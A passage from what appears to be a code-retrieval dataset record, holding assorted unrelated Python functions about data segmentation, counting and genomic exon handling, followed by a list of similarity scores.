self.split_segment_interaction.connect()", "def _subdivideDomain(self, divisionInstructions, trainingSet):\n unclustered = []\n # division instructions are as {subspace: (mode, value)}\n ## where \"value\" is the number of segments in \"split\" mode\n ## or the length of pivot values per segment in \"value\" mode\n self.raiseADebug('Training segmented subspaces for \"{}\" ...'.format(self._romName))\n for subspace, (mode, value) in divisionInstructions.items():\n dataLen = len(trainingSet[subspace][0]) # TODO assumes syncronized histories, or single history\n self._divisionInfo['historyLength'] = dataLen # TODO assumes single pivotParameter\n if mode == 'split':\n numSegments = value # renamed for clarity\n # divide the subspace into equally-sized segments, store the indexes for each segment\n counter = np.array_split(np.arange(dataLen), numSegments)\n # only store bounds, not all indices in between -> note that this is INCLUSIVE!\n counter = list((c[0], c[-1]) for c in counter)\n # Note that \"segmented\" doesn't have \"unclustered\" since chunks are evenly sized\n elif mode == 'value':\n segmentValue = value # renamed for clarity\n # divide the subspace into segments with roughly the same pivot length (e.g. time length)\n pivot = trainingSet[subspace][0]\n # find where the data passes the requested length, and make dividers\n floor = 0 # where does this pivot segment start?\n nextOne = segmentValue # how high should this pivot segment go?\n counter = []\n # TODO speedup; can we do this without looping?\n while pivot[floor] < pivot[-1]:\n cross = np.searchsorted(pivot, nextOne)\n # if the next crossing point is past the end, put the remainder piece\n ## into the \"unclustered\" grouping, since it might be very oddly sized\n ## and throw off segmentation (specifically for clustering)\n if cross == len(pivot):\n unclustered.append((floor, cross - 1))\n break\n # add this segment, only really need to know the first and last index (inclusive)\n counter.append((floor, cross - 1)) # Note: indices are INCLUSIVE\n # update search parameters\n floor = cross\n nextOne += segmentValue\n self.raiseADebug('Dividing {:^20s} into {:^5d} divisions for training ...'.format(subspace, len(counter) + len(unclustered)))\n # return the counter indicies as well as any odd-piece-out parts\n return counter, unclustered", "def testSectionCount(self):\n\n self.sectionCount(3640)", "def getCounts(self):\n ret = [0]*len(self.numToLabel)\n for block in self.blocks:\n for label in block[1]: ret[label] += 1\n return ret", "def getsegs (bounds, split):\n segmentslist=bisect_rectange(split, bounds[0], bounds[1], bounds[2], bounds[3])\n count=1\n segpass=0\n \n #Get list of segment ids currently in database\n query=\"\"\"select seg_id from segment;\"\"\"\n df = pd.read_sql_query(query,con=engine)\n segids=set(df.seg_id)\n \n while count < len(segmentslist):\n try:\n for i in segmentslist:\n segments=getsegmentinfo(i)\n \n \n for seg in segments:\n #If running function several times for different splits, this ignores existing segments and prints a message\n if seg.id in segids: \n segpass+=1\n if (segpass % 10 == 0): \n print (\"{} segments already exist\".format(segpass))\n #Else this is a new segment, so get details from the strava and geocodio apis and save them to a dataframe and eventually to the database\n else:\n location = geocodio_client.reverse((seg.start_latlng[0], seg.start_latlng[1]))\n zipcode=location['results'][0]['address_components']['zip']\n \n newrow = {'seg_id' : seg.id,\n 'resource_state': seg.resource_state,\n 'climb_category':seg.climb_category,\n 'climb_category_desc':seg.climb_category_desc,\n 'average_grade':seg.avg_grade,\n 'elev_difference': str(seg.elev_difference).split()[0],\n 'distance': str(seg.distance).split()[0],\n 'name' : seg.name,\n 'start_lat' : seg.start_latlng[0],\n 'start_long' : seg.start_latlng[1],\n 'end_lat' : seg.end_latlng[0],\n 'end_long' : seg.end_latlng[1],\n 'points' : seg.points,\n 'starred':seg.starred,\n 'zipcode':zipcode\n }\n df=pd.DataFrame(newrow, index=[0])\n \n try:\n #Save dataframe to database\n df.to_sql('segment', engine,index=False,if_exists='append')\n except:\n pass\n\n #Prints message which keeps track of number of sub bounds completed \n if (count % 10) == 0:\n print (\"Getting segments in bound {} of {}\".format(count, len(segmentslist)))\n count+=1\n except Exception as inst:\n print (inst) \n return None", "def countsin(inLoc):\n countFile = open(inLoc, \"r\").readlines()\n counts=[]\n for i in range(1, len(countFile)):\n temp = countFile[i].rstrip().split(\",\")\n counts.append([temp[0][8:], temp[1], temp[2]])\n return counts", "def get_segments(label_file, window=5):\n labels = pd.read_csv(label_file).sort_values('start').reset_index(\n drop=True)\n wlabels = labels.copy()\n wlabels.start -= window\n wlabels.stop += window\n # union segments\n b = []\n for x in wlabels.itertuples():\n if len(b) == 0:\n b.append([x.start, x.stop])\n elif x.start > b[-1][1]:\n b.append([x.start, x.stop])\n elif x.stop > b[-1][1]:\n b[-1][1] = x.stop\n # update labels times to new chunks\n prevchunks = 0\n for j, (start, stop) in enumerate(b):\n mask = (labels.start >= start) & (labels.stop <= stop)\n offset = -start + prevchunks\n labels.loc[mask, [\"start\", \"stop\"]] += offset\n prevchunks += stop - start\n return np.array(b), labels", "def segment_download_count(self):\n # type: () -> int\n return self._segment_download_count", "def segments(seg_type=None):\n\n for index in xrange(idaapi.get_segm_qty()):\n seg = Segment(index=index)\n if (seg_type is None) or (seg.type == seg_type):\n yield Segment(index=index)", "def _get_spans(self, span_info_parts: List[str]) -> List[Tuple[int, int, int]]:\n result_spans = []\n\n for p in span_info_parts:\n if p == \"\":\n break\n c, start, end = p.split(\" \")\n if c not in self._semiotic_classes:\n raise KeyError(\"class=\" + c + \" not found in self._semiotic_classes\")\n cid = self._semiotic_classes[c]\n # +1 because this should be indexing on input_ids which has [CLS] token at beginning\n start = int(start) + 1\n end = int(end) + 1\n result_spans.append((cid, start, end))\n return result_spans", "def segment(self):\n start = self.alignment.matching_function_startpoint(self.idx)\n end = self.alignment.matching_function_endpoint(self.idx)\n return [start, end]", "def set_segments(self, segments):\n self.send_command(Command.SET_SEGMENT_COUNT, [segments])", "def indices_of_split(self, split_name='train'):\n return self.indices_of('split', split_name)", "def _findTangentSplitThreshold(self, angles, threshold):\n splits = []\n\n # split based on angles\n for i, angle in enumerate(angles):\n if angle > threshold:\n splits.append(i + 1)\n\n return splits", "def get_test_segments(data):\n n_channels = data.shape[0]\n n_steps = data.shape[1]\n factor = 2\n n_segments = n_steps // factor\n\n segments = []\n for i_segment in range(n_segments):\n for i_channel in range(n_channels):\n segment = {\n 'index': i_segment + i_channel * n_segments,\n 'start': i_segment,\n 'stop': i_segment + 1,\n 'weight': data[i_channel, factor * i_segment],\n }\n if n_channels > 1:\n segment['channel'] = i_channel\n segments.append(segment)\n\n return segments", "def divisions(self,domain,divisions):\n size = domain.height/divisions\n counter = []\n for i in range(divisions):\n count = ((self.z >= i*size) & (self.z < (i+1)*size)).sum()\n counter.append(count)\n return counter", "def example_to_token_ids_segment_ids_label_ids(\n ex_index,\n example,\n max_seq_length,\n max_evid_length,\n tokenizer):\n if ex_index < 5:\n print('*** Example {} ***'.format(ex_index))\n print('qid: {}'.format(example.qid))\n\n qid = example.qid\n\n # ante evidence\n ante_evidence = example.ante_evidence # list of strings.\n ante_token_ids, ante_segment_ids = [], []\n for ante_sent in ante_evidence:\n ante_sent_tokens = tokenizer.tokenize(ante_sent)\n ante_sent_tokens = ante_sent_tokens[:max_evid_length-2]\n sent_tokens, sent_segment_ids = [], []\n sent_tokens.append(\"<s>\")\n sent_segment_ids.append(0)\n sent_tokens += ante_sent_tokens + [\"</s>\"]\n sent_segment_ids += [0] * len(ante_sent_tokens) + [0]\n\n assert len(sent_tokens) <= max_evid_length\n sent_tokens_ids = tokenizer.convert_tokens_to_ids(sent_tokens)\n\n assert len(sent_tokens_ids) == len(sent_segment_ids)\n ante_token_ids.append(sent_tokens_ids)\n ante_segment_ids.append(sent_segment_ids)\n assert len(ante_evidence) == len(ante_token_ids)\n assert len(ante_evidence) == len(ante_segment_ids)\n l_ante = min(len(ante_evidence), max_evid_length)\n\n # cons evidence\n cons_evidence = example.cons_evidence # list of strings.\n cons_token_ids, cons_segment_ids = [], []\n for cons_sent in cons_evidence:\n cons_sent_tokens = tokenizer.tokenize(cons_sent)\n cons_sent_tokens = cons_sent_tokens[:max_evid_length-2]\n sent_tokens, sent_segment_ids = [], []\n sent_tokens.append(\"<s>\")\n sent_segment_ids.append(0)\n sent_tokens += cons_sent_tokens + [\"</s>\"]\n sent_segment_ids += [0] * len(cons_sent_tokens) + [0]\n\n assert len(sent_tokens) <= max_evid_length\n sent_tokens_ids = tokenizer.convert_tokens_to_ids(sent_tokens)\n\n assert len(sent_tokens_ids) == len(sent_segment_ids)\n cons_token_ids.append(sent_tokens_ids)\n cons_segment_ids.append(sent_segment_ids)\n assert len(cons_evidence) == len(cons_token_ids)\n assert len(cons_evidence) == len(cons_segment_ids)\n l_cons = min(len(cons_evidence), max_evid_length)\n\n para_tokens = tokenizer.tokenize(example.para)\n question_tokens = tokenizer.tokenize(example.question)\n answers_tokens = map(tokenizer.tokenize, example.answers)\n\n token_ids = []\n segment_ids = []\n for choice_idx, answer_tokens in enumerate(answers_tokens):\n\n truncated_para_tokens, \\\n truncated_question_tokens,\\\n truncated_answer_tokens = _truncate_seq_pair(para_tokens, question_tokens, answer_tokens, max_seq_length)\n\n choice_tokens = []\n choice_segment_ids = []\n choice_tokens.append(\"<s>\")\n choice_segment_ids.append(0)\n choice_tokens += truncated_para_tokens + [\"</s>\"]\n choice_segment_ids += [0] * len(truncated_para_tokens) + [0]\n choice_tokens += truncated_question_tokens + [\"</s>\"]\n choice_segment_ids += [1] * len(truncated_question_tokens) + [1]\n choice_tokens += truncated_answer_tokens\n choice_segment_ids += [1] * len(truncated_answer_tokens)\n\n choice_token_ids = tokenizer.convert_tokens_to_ids(choice_tokens)\n\n token_ids.append(choice_token_ids)\n segment_ids.append(choice_segment_ids)\n\n label_ids = [example.label]\n\n if ex_index < 5:\n print('label: {} (id = {:d})'.format(example.label, label_ids[0]))\n\n return ante_token_ids, ante_segment_ids, l_ante, \\\n cons_token_ids, cons_segment_ids, l_cons, \\\n token_ids, segment_ids, label_ids, qid", "def info(self):\n c = 0\n for s in self.segments:\n c+= len(s.points)\n return \"Nodes : %5i\\nSegments : %5i\\nPoints : %5i\" % (len(self.nodes), len(self.segments), c)", "def segments(self):\n L = len(self.vertices)\n return itertools.chain((self._subset((i,i+1)) for i in range(len(self)-1)),\n (self._subset((L-1,0)),))", "def numEvents(self):\n offsets = self.baxH5._offsetsByHole[self.holeNumber]\n return offsets[1] - offsets[0]", "def _num_edges(self):\n return len(self._eid2partid)", "def part2(fname: dict) -> int:\n return sum(len(set.intersection(*[set(pax) for pax in group])) for group in get_data(fname))", "def get_exons(chromStart, chromEnd, blockSizes, blockStarts):\n blockSizes = [int(i) for i in blockSizes.split(\",\") if not i == \"\" ]\n blockStarts = [int(i) for i in blockStarts.split(\",\") if not i == \"\" ]\n n = len(blockSizes)\n exons = []\n #print(\"block: \" + str(n))\n #print(blockSizes, blockStarts)\n for i in range(n):\n #print(i)\n blockStart = blockStarts[i]\n blockSize = blockSizes[i]\n exonStart = chromStart + blockStart\n exonEnd = exonStart + blockSize\n exons.append([exonStart, exonEnd])\n return(exons)", "def collect_two(indiv):\t\r\n\tcnt=0\r\n\tpositions=[]\r\n\tfor i in xrange(0,len(indiv)):\r\n\t\tif indiv[i]==\"2\":\r\n\t\t\tcnt+=1\r\n\t\t\tpositions.append(i)\r\n\treturn cnt, positions", "def count(self) -> int:\n return self.end_measure_num - self.start_measure_num + 1" ]
[ "0.65174055", "0.6436669", "0.6075838", "0.5796184", "0.57153535", "0.57003266", "0.56921184", "0.5661428", "0.5604101", "0.5561135", "0.55508536", "0.553926", "0.5515936", "0.5487367", "0.54719216", "0.54696095", "0.5457705", "0.54412377", "0.537007", "0.5364843", "0.5354218", "0.5335863", "0.53334385", "0.53301716", "0.5315513", "0.5278118", "0.52419317", "0.5225898", "0.52038926", "0.5200646", "0.5196693", "0.51609176", "0.5150832", "0.5137895", "0.5134223", "0.5126972", "0.51248884", "0.51117927", "0.51111287", "0.508531", "0.50580734", "0.5053459", "0.5052621", "0.5045549", "0.5034423", "0.50231344", "0.50072426", "0.50026345", "0.49815243", "0.49771845", "0.49627352", "0.49544355", "0.49310598", "0.48699963", "0.4863025", "0.48584485", "0.48483926", "0.48377845", "0.48265868", "0.4822924", "0.48225364", "0.48147675", "0.48137587", "0.48098528", "0.48049816", "0.4799045", "0.47983438", "0.4794377", "0.47937578", "0.4788201", "0.4784568", "0.47775093", "0.4773467", "0.4763612", "0.47623506", "0.47544044", "0.47531247", "0.47502178", "0.47458857", "0.47453412", "0.4741631", "0.47369128", "0.47274983", "0.4724792", "0.47214755", "0.4712859", "0.47089255", "0.47088844", "0.47067606", "0.4701745", "0.4682772", "0.4678158", "0.4677673", "0.46748427", "0.4667022", "0.46656954", "0.4664624", "0.46581206", "0.46556315", "0.46524578", "0.46521762" ]
0.0
-1
Get the segment expression for one exonpair. Apply 'get_exon_expr' for each exon and concatenate them.
def get_segment_expr(gene, coord, countinfo, Idx, seg_counts, cross_graph_expr): if coord.start_v3 is None: expr_list = np.vstack([get_exon_expr(gene, coord.start_v1, coord.stop_v1, countinfo, Idx, seg_counts ), get_exon_expr(gene, coord.start_v2, coord.stop_v2, countinfo, Idx, seg_counts )]) else: expr_list = np.vstack([get_exon_expr(gene, coord.start_v1, coord.stop_v1, countinfo, Idx, seg_counts ), get_exon_expr(gene, coord.start_v2, coord.stop_v2, countinfo, Idx, seg_counts ), get_exon_expr(gene, coord.start_v3, coord.stop_v3, countinfo, Idx, seg_counts )]) seg_len = np.sum(expr_list[:, 0]) n_samples = expr_list[:, 1:].shape[1] len_factor = np.tile(expr_list[:, 0], n_samples).reshape(n_samples, expr_list.shape[0]).transpose() mean_expr = (np.sum(expr_list[:, 1:]*len_factor, 0) / seg_len).astype(int) if seg_len > 0 else np.zeros(n_samples).astype(int) if not cross_graph_expr: mean_expr = mean_expr[0] return mean_expr,expr_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_exon_expr(gene, vstart, vstop, countinfo, Idx, seg_counts):\n out_shape = (seg_counts.shape[1] + 1) if len(seg_counts.shape) > 1 else 2\n # Todo: deal with absense of count file\n if vstart is np.nan or vstop is np.nan: # isolated exon case\n return np.zeros((0, out_shape), dtype='float')\n if countinfo is None or Idx.sample is None:\n return np.zeros((0, out_shape), dtype='float') #[np.nan]\n\n segments = gene.segmentgraph.segments\n\n sv1_id = bisect.bisect(segments[0], vstart) - 1\n sv2_id = bisect.bisect(segments[0], vstop) - 1\n if sv1_id == sv2_id:\n if len(seg_counts.shape) > 1:\n expr_list = np.c_[np.array([vstop - vstart]), [seg_counts[sv1_id, :]]]\n else:\n expr_list = np.array([(vstop - vstart, seg_counts[sv1_id])])\n else:\n if len(seg_counts.shape) > 1:\n expr_list = np.c_[segments[1, sv1_id:sv2_id + 1] - segments[0, sv1_id:sv2_id + 1], seg_counts[sv1_id:sv2_id + 1, :]]\n else:\n expr_list = np.c_[segments[1, sv1_id:sv2_id + 1] - segments[0, sv1_id:sv2_id + 1], seg_counts[sv1_id:sv2_id + 1, np.newaxis]]\n expr_list[0, 0] -= (vstart - segments[0, sv1_id])\n expr_list[-1, 0] -= (segments[1, sv2_id] - vstop)\n if gene.strand == '-': # need to reverse epression list to match the order of translation\n expr_list = expr_list[::-1]\n return expr_list", "def __get_exon_coordinates(self, exon):\n start = None\n end = None\n if self.__is_padding_enabled():\n start = exon[constants.EXON_PADDED_START]\n end = exon[constants.EXON_PADDED_END]\n else:\n start = exon[constants.EXON_START]\n end = exon[constants.EXON_END]\n return (start, end)", "def getExons(self):\n rtrn = []\n for i in range(0,len(self.exonStarts)):\n rtrn.append(Interval(self.chr,self.exonStarts[i],self.exonEnds[i],self.strand,name = self.name+\"_exon_\"+str(i+1)))\n return rtrn", "def as_exons(self,input={}):\n # handle potentially applied input argument\n self._handle_input_subdict(input)\n # parse data in the AbgpGeneLocusDir\n self.parseinputgff()\n self.rungetorf()\n # we need abgp_geneconfirmation.geneconfirmation first!\n geneconfirmation( { self._create_auto_key(): self.input } )\n\n # get only the CDS-type of tracks that define the coding sequence\n genecdstracks = filtergffs4fmethod( self._obtain_gene_gff(), GFF_CDS_FMETHOD ) \n\n if len(genecdstracks) == 1:\n # deal with SingleExonOnOrf -> TSS + donor\n orf = self.input['orfs'].get_orf_by_id(self.input['orfid-genestructure'][0])\n tss = self._gene_cds_track_2_tss( genecdstracks[0], orf )\n return [ SingleExonOnOrf(tss,genecdstracks[-1][4],orf,gff={}) ]\n\n elif len(genecdstracks) == 0:\n # no tracks !?\n return []\n elif not self.input['orfid-genestructure']:\n # not mappable on Orfs / or no genestructure provided\n return []\n else:\n # list with exons,introns to return \n exons = []\n introns = []\n exonsandintrons = []\n\n # deal with FirstExonOnOrf -> TSS + donor\n try:\n orf = self.input['orfs'].get_orf_by_id(self.input['orfid-genestructure'][0])\n except:\n print self.input.keys(), self.input['proteinfref']\n orf = self.input['orfs'].get_orf_by_id(self.input['orfid-genestructure'][0])\n\n tss = self._gene_cds_track_2_tss( genecdstracks[0], orf )\n donor = self._gene_cds_track_2_donor( genecdstracks[0], orf )\n donor.phase = ( genecdstracks[0][4]-genecdstracks[0][3]-1 ) % 3\n exons.append( FirstExonOnOrf(tss,donor,orf,gff={}) )\n exonsandintrons.append( exons[-1] )\n\n # deal with internal ExonOnOrf(s): -> acceptor + donor\n for pos in range(1,len(genecdstracks)-1):\n orf = self.input['orfs'].get_orf_by_id(self.input['orfid-genestructure'][pos])\n accep = self._gene_cds_track_2_acceptor( genecdstracks[pos], orf )\n accep.phase = exons[-1].donor.phase\n donor = self._gene_cds_track_2_donor( genecdstracks[pos], orf )\n donor.phase = ( genecdstracks[pos][4]-genecdstracks[pos][3]-1+accep.phase ) % 3\n exons.append( ExonOnOrf(accep,donor,orf,gff={}) )\n sharednts = get_shared_nucleotides_at_splicesite(\n exons[-1].orf, exons[-2].orf,\n exons[-1].acceptor, exons[-2].donor,\n )\n intron = IntronConnectingOrfs(\n exons[-2].donor, exons[-1].acceptor, sharednts,\n exons[-2].orf, exons[-1].orf,\n )\n introns.append(intron)\n exonsandintrons.append( introns[-1] )\n exonsandintrons.append( exons[-1] )\n\n # deal with FinalExonOnOrf -> acceptor + StopCodon\n orf = self.input['orfs'].get_orf_by_id(self.input['orfid-genestructure'][-1])\n accep = self._gene_cds_track_2_acceptor( genecdstracks[-1], orf )\n accep.phase = exons[-1].donor.phase\n exons.append( FinalExonOnOrf(accep,genecdstracks[-1][4],orf,gff={}) )\n sharednts = get_shared_nucleotides_at_splicesite(\n exons[-1].orf,exons[-2].orf,\n exons[-1].acceptor,exons[-2].donor,\n )\n intron = IntronConnectingOrfs(\n exons[-2].donor, exons[-1].acceptor, sharednts,\n exons[-2].orf, exons[-1].orf,\n )\n introns.append(intron)\n exonsandintrons.append( introns[-1] )\n exonsandintrons.append( exons[-1] )\n\n # return list of exons&introns\n return exonsandintrons", "def convert_exon_data(opts, exon_recs):\n er0 = exon_recs[0]\n ti = TxInfo(ac=er0[\"tx_ac\"],\n origin=opts.origin,\n hgnc=None,\n cds_se_i=None,\n exons_se_i=\";\".join(\n [\"{},{}\".format(int(ex[\"tx_start\"]) - 1, ex[\"tx_end\"]) for ex in exon_recs])\n )\n es = ExonSet(\n tx_ac=er0[\"tx_ac\"],\n alt_ac=er0[\"ref_ac\"],\n method=\"splign\",\n strand=-1 if er0[\"strand\"] == \"-\" else 1,\n exons_se_i=\";\".join(\n [\"{},{}\".format(int(ex[\"g_start\"]) - 1, ex[\"g_end\"]) for ex in exon_recs])\n )\n return (ti, es)", "def exon_context(exon, start, stop):\n assert start and stop\n exon = exon.split('\\t')\n start = start.split('\\t')\n stop = stop.split('\\t')\n assert len(exon) == 9 and len(start) == 9 and len(stop) == 9\n\n hasstart = feat_overlap(exon, start)\n hasstop = feat_overlap(exon, stop)\n if hasstart or hasstop:\n if hasstart and hasstop:\n return 'complete'\n elif hasstart:\n return 'start'\n else:\n assert hasstop\n return 'stop'\n\n exonstart = int(exon[3])\n exonend = int(exon[4])\n codonnucs = [start[3], start[4], stop[3], stop[4]]\n codonnucs = [int(x) for x in codonnucs]\n leftmostnuc = min(codonnucs)\n rightmostnuc = max(codonnucs)\n if exonend < leftmostnuc:\n if exon[6] == '-':\n return '3putr'\n else:\n return '5putr'\n elif exonstart > rightmostnuc:\n if exon[6] == '-':\n return '5putr'\n else:\n return '3putr'\n else:\n assert exonstart > leftmostnuc and exonend < rightmostnuc\n return 'cds'", "def part_expression(ex_name, stat_type):\n if stat_type =='':\n start = '['\n end = ']'\n else:\n start = '(['\n end = '])'\n expression = stat_type + start + ex_name + end\n return expression", "def _get_einstr(self, nodeindex, parent_nodeindex, contract_index):\n nd = self.order\n str1 = \"\".join([chr(ord('a') + j) for j in range(nd)])\n str2 = \"R\" + (chr(ord('a') + contract_index))\n str3 = \"\".join(\n [chr(ord('a') + j)\n for j in range(contract_index)]) + \"R\" + \"\".join(\n [chr(ord('a') + j) for j in range(contract_index + 1, nd)])\n einstr = str1 + \",\" + str2 + \"->\" + str3\n return einstr", "def expression_maker(ex_names, stat_type):\n if len(ex_names) == 1:\n expression = part_expression(ex_names[0], stat_type)\n else:\n current_part = ex_names.pop(-1)\n expression = (expression_maker(ex_names, stat_type) + ','\n + part_expresion(current_part, stat_type))\n\n return expression", "def _getvalue_expr_Str(self, expr: ast.Str) -> Any:\n return expr.s", "def _findEvidExonRange(self, transAnnot, evidTrans):\n # Walk from start to find start and end to find end, as multiple might overlap,\n # however don't go past bounds of the annotation, in case evidence and annotation\n # are interleaved. This would be simper without the extend mode.\n return (self._findEvidExonRangeStart(transAnnot, evidTrans),\n self._findEvidExonRangeEnd(transAnnot, evidTrans))", "def _Expr(self, tree):\n # Catch odd case of multi line strings and doc strings which are Expr with a Constant string type value\n if isinstance(tree.value, ast.Constant):\n if isinstance(tree.value.value, str):\n return\n # catch special case of Python 3.7 Where doc string is a Str and not a Constant\n elif isinstance(tree.value, ast.Str):\n return \n # otherwise treat like a normal expression\n self.fill()\n self.dispatch(tree.value)\n self.write(\";\")", "def evaluate(self, edict):\n result = self._evaluateBySegments(edict)\n # allow each segment ROM to modify signal based on global training settings\n for s, segment in enumerate(self._getSequentialRoms()):\n delim = self._divisionInfo['delimiters'][s]\n picker = slice(delim[0], delim[-1] + 1)\n result = segment.finalizeLocalRomSegmentEvaluation(self._romGlobalAdjustments, result, picker)\n result = self._templateROM.finalizeGlobalRomSegmentEvaluation(self._romGlobalAdjustments, result)\n return result", "def createExon(strand_p, five_p_utr, cds_cod, three_p_utr):\n exon_pos = []\n if strand_p == '+': \n utr5_start, utr5_end = 0, 0\n if five_p_utr != []:\n utr5_start, utr5_end = five_p_utr[-1][0], five_p_utr[-1][1] \n cds_5start, cds_5end = cds_cod[0][0], cds_cod[0][1]\n jun_exon = []\n if cds_5start-utr5_end == 0 or cds_5start-utr5_end == 1:\n jun_exon = [utr5_start, cds_5end] \n if len(cds_cod) == 1:\n five_prime_flag = 0\n if jun_exon != []:\n five_p_utr = five_p_utr[:-1]\n five_prime_flag = 1\n for utr5 in five_p_utr:\n exon_pos.append(utr5)\n jun_exon = []\n utr3_start, utr3_end = 0, 0\n if three_p_utr != []: \n utr3_start = three_p_utr[0][0]\n utr3_end = three_p_utr[0][1]\n if utr3_start-cds_5end == 0 or utr3_start-cds_5end == 1:\n jun_exon = [cds_5start, utr3_end]\n three_prime_flag = 0\n if jun_exon != []: \n cds_cod = cds_cod[:-1]\n three_p_utr = three_p_utr[1:]\n three_prime_flag = 1\n if five_prime_flag == 1 and three_prime_flag == 1:\n exon_pos.append([utr5_start, utr3_end])\n if five_prime_flag == 1 and three_prime_flag == 0:\n exon_pos.append([utr5_start, cds_5end])\n cds_cod = cds_cod[:-1]\n if five_prime_flag == 0 and three_prime_flag == 1:\n exon_pos.append([cds_5start, utr3_end])\n for cds in cds_cod:\n exon_pos.append(cds)\n for utr3 in three_p_utr:\n exon_pos.append(utr3)\n else: \n if jun_exon != []:\n five_p_utr = five_p_utr[:-1]\n cds_cod = cds_cod[1:]\n for utr5 in five_p_utr:\n exon_pos.append(utr5)\n exon_pos.append(jun_exon) if jun_exon != [] else ''\n jun_exon = []\n utr3_start, utr3_end = 0, 0\n if three_p_utr != []:\n utr3_start = three_p_utr[0][0]\n utr3_end = three_p_utr[0][1]\n cds_3start = cds_cod[-1][0]\n cds_3end = cds_cod[-1][1]\n if utr3_start-cds_3end == 0 or utr3_start-cds_3end == 1: \n jun_exon = [cds_3start, utr3_end]\n if jun_exon != []:\n cds_cod = cds_cod[:-1]\n three_p_utr = three_p_utr[1:]\n for cds in cds_cod:\n exon_pos.append(cds)\n exon_pos.append(jun_exon) if jun_exon != [] else ''\n for utr3 in three_p_utr:\n exon_pos.append(utr3)\n elif strand_p == '-':\n utr3_start, utr3_end = 0, 0 \n if three_p_utr != []:\n utr3_start = three_p_utr[-1][0]\n utr3_end = three_p_utr[-1][1]\n cds_3start = cds_cod[0][0]\n cds_3end = cds_cod[0][1]\n jun_exon = []\n if cds_3start-utr3_end == 0 or cds_3start-utr3_end == 1:\n jun_exon = [utr3_start, cds_3end] \n if len(cds_cod) == 1: \n three_prime_flag = 0\n if jun_exon != []:\n three_p_utr = three_p_utr[:-1]\n three_prime_flag = 1\n for utr3 in three_p_utr:\n exon_pos.append(utr3)\n jun_exon = []\n (utr5_start, utr5_end) = (0, 0)\n if five_p_utr != []:\n utr5_start = five_p_utr[0][0]\n utr5_end = five_p_utr[0][1]\n if utr5_start-cds_3end == 0 or utr5_start-cds_3end == 1:\n jun_exon = [cds_3start, utr5_end]\n five_prime_flag = 0\n if jun_exon != []:\n cds_cod = cds_cod[:-1]\n five_p_utr = five_p_utr[1:]\n five_prime_flag = 1\n if three_prime_flag == 1 and five_prime_flag == 1:\n exon_pos.append([utr3_start, utr5_end])\n if three_prime_flag == 1 and five_prime_flag == 0:\n exon_pos.append([utr3_start, cds_3end])\n cds_cod = cds_cod[:-1]\n if three_prime_flag == 0 and five_prime_flag == 1:\n exon_pos.append([cds_3start, utr5_end]) \n for cds in cds_cod:\n exon_pos.append(cds)\n for utr5 in five_p_utr:\n exon_pos.append(utr5)\n else:\n if jun_exon != []:\n three_p_utr = three_p_utr[:-1]\n cds_cod = cds_cod[1:]\n for utr3 in three_p_utr:\n exon_pos.append(utr3) \n if jun_exon != []:\n exon_pos.append(jun_exon)\n jun_exon = []\n (utr5_start, utr5_end) = (0, 0)\n if five_p_utr != []:\n utr5_start = five_p_utr[0][0]\n utr5_end = five_p_utr[0][1] \n cds_5start = cds_cod[-1][0]\n cds_5end = cds_cod[-1][1]\n if utr5_start-cds_5end == 0 or utr5_start-cds_5end == 1:\n jun_exon = [cds_5start, utr5_end]\n if jun_exon != []:\n cds_cod = cds_cod[:-1]\n five_p_utr = five_p_utr[1:]\n for cds in cds_cod:\n exon_pos.append(cds)\n if jun_exon != []:\n exon_pos.append(jun_exon) \n for utr5 in five_p_utr:\n exon_pos.append(utr5)\n return exon_pos", "def getholder_exp_pairs_sent(sent, expr, holders, exptype=False, isolate_exp=True, test=False):\n tuples = []\n if not exptype:\n exptypelist = EXPTYPES\n else:\n exptypelist = [exptype]\n for exptype in exptypelist:\n #print exptype\n for gate in expr[exptype].values():\n tmp = False\n try:\n tmp = gate['GATE']['nested_source_split'][-1]\n except:\n # Some expressions lack nested-source\n if DEBUG:\n print 'missing nested-source for', gate['GATE']\n tmp = False\n counters['exp-pair no nested source'] += 1\n if tmp: \n if tmp in holders:\n if isinstance(holders[tmp], OrderedDict):\n coref = []\n for h in holders[tmp].values():\n coref.append(h['token_id'])\n for h in holders[tmp].values():\n tuples.append((gate['token_id'], h['token_id'], exptype, coref))\n else:\n tuples.append((gate['token_id'], holders[tmp]['token_id'], exptype, False))\n elif tmp == 'writer' or tmp == 'w':\n #print \"w\"\n tuples.append((gate['token_id'], 'w', exptype, False))\n else: #Implicit\n #print \"i\"\n tuples.append((gate['token_id'], 'implicit', exptype, False))\n return tuples", "def getexpressions_sent(sent, predict=False):\n expr = {}\n if predict:\n gatekey = 'PGATE'\n else:\n gatekey = 'GATE'\n for exptype in EXPTYPES:\n expr[exptype] = OrderedDict()\n for i, t in enumerate(sent):\n for gate in t[gatekey]:\n if gate['slice'].start != gate['slice'].stop:\n tmp = gate['ann_type']\n if re_ose.match(tmp):\n if gate['line_id'] not in expr['ose']:\n expr['ose'][gate['line_id']] = {gatekey: gate,\n 'token_id': set([i+1])}\n else:\n expr['ose'][gate['line_id']]['token_id'].add(i+1)\n elif re_ese.match(tmp): #tmp == 'GATE_expressive-subjectivity':\n if gate['line_id'] not in expr['ese']:\n expr['ese'][gate['line_id']] = {gatekey: gate,\n 'token_id': set([i+1])}\n else:\n expr['ese'][gate['line_id']]['token_id'].add(i+1)\n elif re_dse.match(tmp): #tmp == 'GATE_direct-subjective':\n if gate['line_id'] not in expr['dse']:\n expr['dse'][gate['line_id']] = {gatekey: gate,\n 'token_id': set([i+1])}\n else:\n expr['dse'][gate['line_id']]['token_id'].add(i+1)\n return expr", "def render_expression(ex):\r\n try:\r\n return _render_to_html(_get_final_tree(ex))\r\n except ParseException:\r\n return err(ex)", "def calculate(self, expression):\n array = []\n for value in expression:\n array.append(value)\n return self.__helper_function(array)", "def get_eco_details(self, pgn_data):\n result = eco_mapping['unknown']\n\n try:\n moves = self.get_moves(pgn_data)\n current_sequence = ''\n\n for move in moves:\n half_move = '.'.join([move[0], move[1]])\n current_sequence += half_move\n\n if current_sequence in eco_mapping:\n result = eco_mapping[current_sequence]\n else:\n break\n\n current_sequence = ' '.join([current_sequence, move[2]])\n\n if current_sequence in eco_mapping:\n result = eco_mapping[current_sequence]\n else:\n break\n\n current_sequence += ' '\n except:\n pass\n\n return result", "def _get_energies_atom(self, file1, file2, natom):\n esp = loadtxt(file1)\n etot = loadtxt(file2)\n esp_at = esp[-natom:,1]\n etot_at = etot[-natom:,1]\n return esp_at, etot_at", "def _GetExpressions(self,key=\"\"):\r\n global commonexpressions\r\n global uniqexpressions\r\n result=[]\r\n if not self.classname: return result\r\n if not 